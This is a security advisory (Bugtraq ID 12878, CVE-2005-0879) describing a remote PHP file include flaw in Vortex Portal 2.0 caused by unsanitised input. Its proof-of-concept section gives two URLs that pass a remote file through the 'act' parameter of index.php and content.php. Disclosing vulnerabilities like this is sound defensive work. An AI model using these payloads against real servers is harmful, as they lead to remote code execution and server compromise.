BID:12878

Vortex Portal Remote PHP File Include Vulnerability

Info

Vortex Portal Remote PHP File Include Vulnerability

Bugtraq ID:	12878
Class:	Input Validation Error
CVE:	CVE-2005-0879
Remote:	Yes
Local:	No
Published:	Mar 23 2005 12:00AM
Updated:	Jul 12 2009 11:56AM
Credit:	Discovery of this vulnerability is credited to Francisco Alisson <[email protected]>.
Vulnerable:	Vortex Portal Vortex Portal 2.0

Not Vulnerable:

Discussion

Vortex Portal Remote PHP File Include Vulnerability

Vortex Portal is reportedly affected by a remote PHP file include vulnerability. This issue is due to a failure in the application to properly sanitize user supplied input.

It is conjectured this vulnerability affects the latest release of Vortex Portal, version 2.0.

Exploit / POC

Vortex Portal Remote PHP File Include Vulnerability

No exploit is required.

The following proof of concepts are available:
http://www.example.com/index.php?act=http://www.example.com/file
http://www.example.com/content.php?act=http://www.example.com/file

Solution / Fix

Vortex Portal Remote PHP File Include Vulnerability

Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected] <mailto:[email protected]>.

References

Vortex Portal Remote PHP File Include Vulnerability

References:

Vortex Portal Homepage (Vortex Portal)
Vortex Portal (Francisco Alisson )